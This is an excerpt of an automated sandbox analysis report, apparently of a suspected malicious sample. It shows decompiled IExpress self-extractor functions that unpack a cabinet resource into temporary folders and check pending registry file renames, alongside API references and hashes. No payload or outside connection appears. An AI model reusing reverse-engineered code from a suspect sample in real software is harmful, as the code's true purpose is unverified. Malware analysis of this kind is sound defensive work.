                                                                                                                                                                                                                                    0x00965117
                                                                                                                                                                                                                                    0x00965117
                                                                                                                                                                                                                                    0x0096511f
                                                                                                                                                                                                                                    0x00965121
                                                                                                                                                                                                                                    0x00965127
                                                                                                                                                                                                                                    0x00965135
                                                                                                                                                                                                                                    0x00965135
                                                                                                                                                                                                                                    0x00965127
                                                                                                                                                                                                                                    0x00965141
                                                                                                                                                                                                                                    0x00965159
                                                                                                                                                                                                                                    0x00965159
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096515f

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646A0
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: SizeofResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646A9
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646C3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LoadResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646CC
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LockResource.KERNEL32(00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646D3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: memcpy_s.MSVCRT ref: 009646E5
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009646EF
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00964FFE
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00965006
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0096500D
                                                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000842), ref: 00965030
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00965037
                                                                                                                                                                                                                                    • GetDlgItem.USER32(00000841,00000005), ref: 0096504A
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00965051
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00965111
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00965159
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                    • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                    • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                    • Opcode ID: eb2e17529368bd49dcff0bc03a603f7a2830115d4e5b63ebc43d1901d8497006
                                                                                                                                                                                                                                    • Instruction ID: ac6ebd2dc12cef18a47aa3e2e4e25464aa70935bf1080cedf932ff543839e2b1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb2e17529368bd49dcff0bc03a603f7a2830115d4e5b63ebc43d1901d8497006
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8310DB075C3017FD7205BA1AD89F67369CB787B49F06001CF902F21A1DAF5CC40AA55
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009653A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                    			E009653A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x968004; // 0xf4cc89a0
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0096171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00961680(_t32, 0x104, _t20);
					E0096658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00966CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x968a20 = 1;
				goto L5;
			}

















                                                                                                                                                                                                                                    0x009653ac
                                                                                                                                                                                                                                    0x009653b3
                                                                                                                                                                                                                                    0x009653b9
                                                                                                                                                                                                                                    0x009653bb
                                                                                                                                                                                                                                    0x009653bd
                                                                                                                                                                                                                                    0x009653bf
                                                                                                                                                                                                                                    0x009653d1
                                                                                                                                                                                                                                    0x009653d6
                                                                                                                                                                                                                                    0x009653e0
                                                                                                                                                                                                                                    0x009653e2
                                                                                                                                                                                                                                    0x009653f5
                                                                                                                                                                                                                                    0x009653fb
                                                                                                                                                                                                                                    0x00965402
                                                                                                                                                                                                                                    0x0096540b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965413
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965415
                                                                                                                                                                                                                                    0x00965416
                                                                                                                                                                                                                                    0x00965427
                                                                                                                                                                                                                                    0x0096542a
                                                                                                                                                                                                                                    0x0096542b
                                                                                                                                                                                                                                    0x00965434
                                                                                                                                                                                                                                    0x00965434
                                                                                                                                                                                                                                    0x0096543a
                                                                                                                                                                                                                                    0x0096544c
                                                                                                                                                                                                                                    0x0096544c
                                                                                                                                                                                                                                    0x00965452
                                                                                                                                                                                                                                    0x0096545a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096545e
                                                                                                                                                                                                                                    0x0096545f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0096171E: _vsnprintf.MSVCRT ref: 00961750
                                                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 009653FB
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00965402
                                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0096541F
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0096542B
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00965434
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00965452
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                    • API String ID: 1082909758-3361814588
                                                                                                                                                                                                                                    • Opcode ID: cea05401533496fc4c03fcd0536c00d84ee093a0eb23173f1cbb12993ce96eb1
                                                                                                                                                                                                                                    • Instruction ID: 7fd5a212ebb31bc91cb5cabceea17e3555d61c517f19468c8594b65c656ad2fe
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cea05401533496fc4c03fcd0536c00d84ee093a0eb23173f1cbb12993ce96eb1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B11237130851477D7209B369C49FEF366DEFC2711F040169F646E22A0CEB48D829AA2
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00965467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 478 965467-965484 479 96551c-965528 call 961680 478->479 480 96548a-965490 call 9653a1 478->480 483 96552d-965539 call 9658c8 479->483 484 965495-965497 480->484 493 96554d-965552 483->493 494 96553b-965545 CreateDirectoryA 483->494 485 965581-965583 484->485 486 96549d-9654c0 call 961781 484->486 488 96558d-96559d call 966ce0 485->488 495 9654c2-9654d8 GetSystemInfo 486->495 496 96550c-96551a call 96658a 486->496 500 965554-965557 call 96597d 493->500 501 965585-96558b 493->501 498 965577-96557c call 966285 494->498 499 965547 494->499 502 9654fe 495->502 503 9654da-9654dd 495->503 496->483 498->485 499->493 509 96555c-96555e 500->509 501->488 510 965503-965507 call 96658a 502->510 507 9654f7-9654fc 503->507 508 9654df-9654e2 503->508 507->510 513 9654e4-9654e7 508->513 514 9654f0-9654f5 508->514 509->501 515 965560-965566 509->515 510->496 513->496 517 9654e9-9654ee 513->517 514->510 515->485 518 965568-965575 RemoveDirectoryA 515->518 517->510 518->485
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E00965467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x968004; // 0xf4cc89a0
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x9691e4;
					_t42 = 0x104;
					E00961680(0x9691e4, 0x104);
					L14:
					_t13 = E009658C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x969124 = 0;
							_t14 = 1;
							L24:
							return E00966CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0096597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x968a20; // 0x0
						if(_t61 != 0) {
							 *0x968a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x969124 = E00966285();
						goto L22;
					}
					 *0x968a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E009653A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x9691e4;
				E00961781(0x9691e4, 0x104, __ecx,  &_v268);
				if(( *0x969a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0096658A(_t48, 0x104, 0x961140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0096658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}




















                                                                                                                                                                                                                                    0x00965472
                                                                                                                                                                                                                                    0x00965479
                                                                                                                                                                                                                                    0x00965481
                                                                                                                                                                                                                                    0x00965484
                                                                                                                                                                                                                                    0x0096551c
                                                                                                                                                                                                                                    0x00965521
                                                                                                                                                                                                                                    0x00965528
                                                                                                                                                                                                                                    0x0096552d
                                                                                                                                                                                                                                    0x0096552f
                                                                                                                                                                                                                                    0x00965539
                                                                                                                                                                                                                                    0x0096554d
                                                                                                                                                                                                                                    0x0096554d
                                                                                                                                                                                                                                    0x00965552
                                                                                                                                                                                                                                    0x00965585
                                                                                                                                                                                                                                    0x00965585
                                                                                                                                                                                                                                    0x0096558b
                                                                                                                                                                                                                                    0x0096558d
                                                                                                                                                                                                                                    0x0096559d
                                                                                                                                                                                                                                    0x0096559d
                                                                                                                                                                                                                                    0x00965557
                                                                                                                                                                                                                                    0x0096555e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965560
                                                                                                                                                                                                                                    0x00965566
                                                                                                                                                                                                                                    0x00965569
                                                                                                                                                                                                                                    0x0096556f
                                                                                                                                                                                                                                    0x0096556f
                                                                                                                                                                                                                                    0x00965581
                                                                                                                                                                                                                                    0x00965581
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965581
                                                                                                                                                                                                                                    0x00965545
                                                                                                                                                                                                                                    0x0096557c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096557c
                                                                                                                                                                                                                                    0x00965547
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965547
                                                                                                                                                                                                                                    0x0096548a
                                                                                                                                                                                                                                    0x00965490
                                                                                                                                                                                                                                    0x00965497
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096549d
                                                                                                                                                                                                                                    0x009654ab
                                                                                                                                                                                                                                    0x009654b4
                                                                                                                                                                                                                                    0x009654c0
                                                                                                                                                                                                                                    0x0096550c
                                                                                                                                                                                                                                    0x00965511
                                                                                                                                                                                                                                    0x00965515
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965515
                                                                                                                                                                                                                                    0x009654c9
                                                                                                                                                                                                                                    0x009654d6
                                                                                                                                                                                                                                    0x009654d8
                                                                                                                                                                                                                                    0x009654fe
                                                                                                                                                                                                                                    0x00965503
                                                                                                                                                                                                                                    0x00965507
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965507
                                                                                                                                                                                                                                    0x009654da
                                                                                                                                                                                                                                    0x009654dd
                                                                                                                                                                                                                                    0x009654f7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009654f7
                                                                                                                                                                                                                                    0x009654df
                                                                                                                                                                                                                                    0x009654e2
                                                                                                                                                                                                                                    0x009654f0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009654f0
                                                                                                                                                                                                                                    0x009654e7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009654e9
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 009654C9
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0096553D
                                                                                                                                                                                                                                    • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0096556F
                                                                                                                                                                                                                                      • Part of subcall function 009653A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 009653FB
                                                                                                                                                                                                                                      • Part of subcall function 009653A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00965402
                                                                                                                                                                                                                                      • Part of subcall function 009653A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0096541F
                                                                                                                                                                                                                                      • Part of subcall function 009653A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0096542B
                                                                                                                                                                                                                                      • Part of subcall function 009653A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00965434
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                    • API String ID: 1979080616-510557316
                                                                                                                                                                                                                                    • Opcode ID: b63e6cab18e384ccff07d9a1c8c25ee5f2ef7e3cd7200d5910b83c0790da65cd
                                                                                                                                                                                                                                    • Instruction ID: 3098ed641d3c33609e861e6b570df7eaa8981bb97253c29ea10449af31729b79
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b63e6cab18e384ccff07d9a1c8c25ee5f2ef7e3cd7200d5910b83c0790da65cd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D312770B18A105BCB109B299C49A7F779EABC2344F1A012EF803D3650DFB4CE419A91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0096256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 519 96256d-96257d 520 962622-962627 call 9624e0 519->520 521 962583-962589 519->521 526 962629-96262f 520->526 522 96258b 521->522 523 9625e8-962607 RegOpenKeyExA 521->523 525 962591-962595 522->525 522->526 527 9625e3-9625e6 523->527 528 962609-962620 RegQueryInfoKeyA 523->528 525->526 530 96259b-9625ba RegOpenKeyExA 525->530 527->526 531 9625d1-9625dd RegCloseKey 528->531 530->527 532 9625bc-9625cb RegQueryValueExA 530->532 531->527 532->531
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E0096256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E009624E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}











                                                                                                                                                                                                                                    0x00962572
                                                                                                                                                                                                                                    0x00962573
                                                                                                                                                                                                                                    0x00962575
                                                                                                                                                                                                                                    0x00962578
                                                                                                                                                                                                                                    0x0096257d
                                                                                                                                                                                                                                    0x00962627
                                                                                                                                                                                                                                    0x00962583
                                                                                                                                                                                                                                    0x00962586
                                                                                                                                                                                                                                    0x00962589
                                                                                                                                                                                                                                    0x009625eb
                                                                                                                                                                                                                                    0x00962607
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962609
                                                                                                                                                                                                                                    0x0096261a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096261a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096258b
                                                                                                                                                                                                                                    0x0096258b
                                                                                                                                                                                                                                    0x0096259e
                                                                                                                                                                                                                                    0x009625b2
                                                                                                                                                                                                                                    0x009625ba
                                                                                                                                                                                                                                    0x009625cb
                                                                                                                                                                                                                                    0x009625d1
                                                                                                                                                                                                                                    0x009625d6
                                                                                                                                                                                                                                    0x009625da
                                                                                                                                                                                                                                    0x009625dd
                                                                                                                                                                                                                                    0x009625dd
                                                                                                                                                                                                                                    0x009625e3
                                                                                                                                                                                                                                    0x009625e3
                                                                                                                                                                                                                                    0x009625e3
                                                                                                                                                                                                                                    0x0096258b
                                                                                                                                                                                                                                    0x00962589
                                                                                                                                                                                                                                    0x0096262f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00964096,00964096,?,00961ED3,00000001,00000000,?,?,00964137,?), ref: 009625B2
                                                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00964096,?,00961ED3,00000001,00000000,?,?,00964137,?,00964096), ref: 009625CB
                                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,00961ED3,00000001,00000000,?,?,00964137,?,00964096), ref: 009625DD
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00964096,00964096,?,00961ED3,00000001,00000000,?,?,00964137,?), ref: 009625FF
                                                                                                                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00964096,00000000,00000000,00000000,00000000,?,00961ED3,00000001,00000000), ref: 0096261A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 009625F5
                                                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager, xrefs: 009625A8
                                                                                                                                                                                                                                    • PendingFileRenameOperations, xrefs: 009625C3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                    • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                    • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                    • Opcode ID: e6044271a5daa9660a0d3f2511c5ab0b66ca2a7a1aa8154b92bedd0387c3a2d3
                                                                                                                                                                                                                                    • Instruction ID: 22fa6abd1dc0d666b2a4699c1fc222f04c0a27255c3c3f997ea84666911f1c8f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6044271a5daa9660a0d3f2511c5ab0b66ca2a7a1aa8154b92bedd0387c3a2d3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09118C35956228BB9B209B92DC09DFBBE7CEF427A5F504156F809F2010DA705E44FAA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00966A60 Relevance: 13.6, APIs: 9, Instructions: 138sleepCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
